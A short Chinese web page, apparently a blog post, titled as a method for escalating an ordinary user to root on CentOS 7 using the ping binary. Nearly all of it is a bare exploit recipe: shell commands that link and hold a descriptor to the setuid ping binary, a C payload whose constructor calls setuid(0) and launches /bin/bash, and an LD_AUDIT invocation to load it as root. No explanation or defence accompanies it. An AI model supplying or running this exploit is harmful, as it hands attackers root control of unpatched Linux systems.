<返回更多

Centos7使用ping命令对普通用户提权

2021-12-22    SofM
加入收藏
yum -y install gcc automake autoconf libtool make
adduser test
passwd test
mkdir /tmp/exploit
ln -s /usr/bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
ls -l /proc/$$/fd/3
rm -rf /tmp/exploit
ls -l /proc/$$/fd/3
vim payload.c

void __attribute__((constructor)) init() 
{
setuid(0); system("/bin/bash"); 
}
gcc -w -fPIC -shared -o /tmp/exploit payload.c
ls -l /tmp/exploit
LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
whoami

 

Centos7使用ping命令对普通用户提权

 

声明:本站部分内容来自互联网,如有版权侵犯或其他问题请与我们联系,我们将立即删除或处理。
▍相关推荐
更多资讯 >>>